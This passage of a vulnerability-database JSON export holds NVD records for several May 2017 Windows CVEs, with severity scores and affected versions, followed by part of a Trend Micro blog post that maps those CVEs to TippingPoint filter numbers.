This CVE ID is unique from CVE-2017-0214.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0213", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0213", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0213", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:05", "description": "The Graphics Component in the kernel-mode drivers in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allows local users to gain privileges via a crafted application or in Windows 7 for x64-based Systems and later, cause denial of service, aka \"Win32k Elevation of Privilege Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0246", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2017-0246"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0246", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0246", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:21", "description": "The kernel-mode drivers in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0263", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0263", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0263", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:49:55", "description": "Windows DNS Server allows a denial of service vulnerability when Microsoft Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 Gold and R2, and Windows Server 2016 are configured to answer version queries, aka \"Windows DNS Server Denial of Service Vulnerability\".", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0171", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0171"], "modified": "2017-05-25T15:33:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0171", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0171", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": 
["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:05", "description": "The kernel-mode drivers in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1 and Windows Server 2012 Gold allow a local authenticated attacker to execute a specially crafted application to obtain kernel information, aka \"Win32k Information Disclosure Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0245", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0245"], "modified": "2017-08-13T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0245", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0245", "cvss": {"score": 1.9, "vector": 
"AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:01", "description": "An information disclosure vulnerability exists in the way some ActiveX objects are instantiated, aka \"Microsoft ActiveX Information Disclosure Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0242", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0242"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2017-0242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0242", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:03", "description": "The kernel in Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows locally authenticated attackers to gain privileges via a crafted application, or in Windows 7 for x64-based systems, cause denial of service, aka \"Windows Kernel Elevation of Privilege Vulnerability.\"", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0244", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0244"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2017-0244", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0244", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:13", "description": "The GDI component in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka \"GDI Information Disclosure Vulnerability.\"", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 4.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0190", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0190"], "modified": "2017-07-08T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", 
"cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0190", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:48:18", "description": "The kernel-mode drivers in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow a local authenticated attacker to execute a specially crafted application to obtain information, or in Windows 7 and later, cause denial of service, aka \"Win32k Information Disclosure Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0077", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0077", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0077", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}], "trendmicroblog": [{"lastseen": "2017-05-18T08:47:17", "description": "\n\nAlthough I\u2019m still dreaming of the sandy beaches of Cancun, it\u2019s time to get back to reality. Security vulnerabilities never take a holiday and this week is no exception. 
In addition to our normal Digital Vaccine (DV) package delivered earlier this week, we also issued an out-of-band DV package to address zero-day vulnerabilities for Intel Active Management Technology (AMT) ([CVE-2017-5689](<https://nvd.nist.gov/vuln/detail/CVE-2017-5689>)) and Windows Defender ([CVE-2017-0290](<https://nvd.nist.gov/vuln/detail/CVE-2017-0290>)).\n\nThe Intel AMT vulnerability is an escalation of privilege vulnerability that allows an unprivileged attacker to gain control of the manageability features provided by the affected Intel AMT products. The Windows Defender vulnerability is much scarier because it allows a remote attacker to take over a system without any interaction from the system owner. Just the mere execution of Windows Defender scanning an email or instant message from an attacker is enough. But don\u2019t worry \u2013 customers using TippingPoint solutions are protected from these vulnerabilities with the following DV filters:\n\n * 28214: HTTP: Null response digest\n * 28221: HTTP: Microsoft Malware Protection Engine mpengine Type Confusion Vulnerability\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before May 9, 2017. Microsoft released patches for 55 new CVEs in Internet Explorer, Edge, Office, Windows, and .NET Framework. A total of 14 of these CVEs are rated Critical while the rest are rated Important in severity. The following table maps Digital Vaccine filters to the Microsoft updates. Filters marked with an (*) shipped prior to this DV package, providing zero-day protection for our customers. 
You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [May 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/5/5/the-may-2017-security-update-review>):\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0064 | | Insufficient Vendor Information \nCVE-2017-0077 | 28112 | \nCVE-2017-0171 | | Insufficient Vendor Information \nCVE-2017-0175 | 28183 | \nCVE-2017-0190 | | Insufficient Vendor Information \nCVE-2017-0212 | | Insufficient Vendor Information \nCVE-2017-0213 | 28184 | \nCVE-2017-0214 | 28189 | \nCVE-2017-0220 | 28198 | \nCVE-2017-0221 | 28114 | \nCVE-2017-0222 | | Insufficient Vendor Information \nCVE-2017-0224 | | Insufficient Vendor Information \nCVE-2017-0226 | | Insufficient Vendor Information \nCVE-2017-0227 | 28130 | \nCVE-2017-0228 | *27538 | \nCVE-2017-0229 | | Insufficient Vendor Information \nCVE-2017-0230 | | Insufficient Vendor Information \nCVE-2017-0231 | | Insufficient Vendor Information \nCVE-2017-0233 | | Insufficient Vendor Information \nCVE-2017-0234 | *27532 | \nCVE-2017-0235 | | Insufficient Vendor Information \nCVE-2017-0236 | *27536 | \nCVE-2017-0238 | *27540 | \nCVE-2017-0240 | *27541, *27542 | \nCVE-2017-0241 | | Insufficient Vendor Information \nCVE-2017-0242 | | Insufficient Vendor Information \nCVE-2017-0243 | 28192 | \nCVE-2017-0244 | | Insufficient Vendor Information \nCVE-2017-0245 | 28185 | \nCVE-2017-0246 | 28111 | \nCVE-2017-0248 | | Insufficient Vendor Information \nCVE-2017-0254 | | Insufficient Vendor Information \nCVE-2017-0255 | | Insufficient Vendor Information \nCVE-2017-0258 | 28199 | \nCVE-2017-0259 | 28200 | \nCVE-2017-0261 | | Insufficient Vendor Information \nCVE-2017-0262 | | Insufficient Vendor Information \nCVE-2017-0263 | 28186 | \nCVE-2017-0264 | | Insufficient Vendor Information \nCVE-2017-0265 | | Insufficient Vendor Information \nCVE-2017-0266 | 28193 | \nCVE-2017-0267 | | Insufficient Vendor Information 
\nCVE-2017-0268 | | Insufficient Vendor Information \nCVE-2017-0269 | | Insufficient Vendor Information \nCVE-2017-0270 | | Insufficient Vendor Information \nCVE-2017-0271 | | Insufficient Vendor Information \nCVE-2017-0272 | | Insufficient Vendor Information \nCVE-2017-0273 | | Insufficient Vendor Information \nCVE-2017-0274 | | Insufficient Vendor Information \nCVE-2017-0275 | | Insufficient Vendor Information \nCVE-2017-0276 | | Insufficient Vendor Information \nCVE-2017-0277 | | Insufficient Vendor Information \nCVE-2017-0278 | | Insufficient Vendor Information \nCVE-2017-0279 | | Insufficient Vendor Information \nCVE-2017-0280 | | Insufficient Vendor Information \nCVE-2017-0281 | | Insufficient Vendor Information \n \n \n\n**Zero-Day Filters**\n\nThere are 14 new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. 
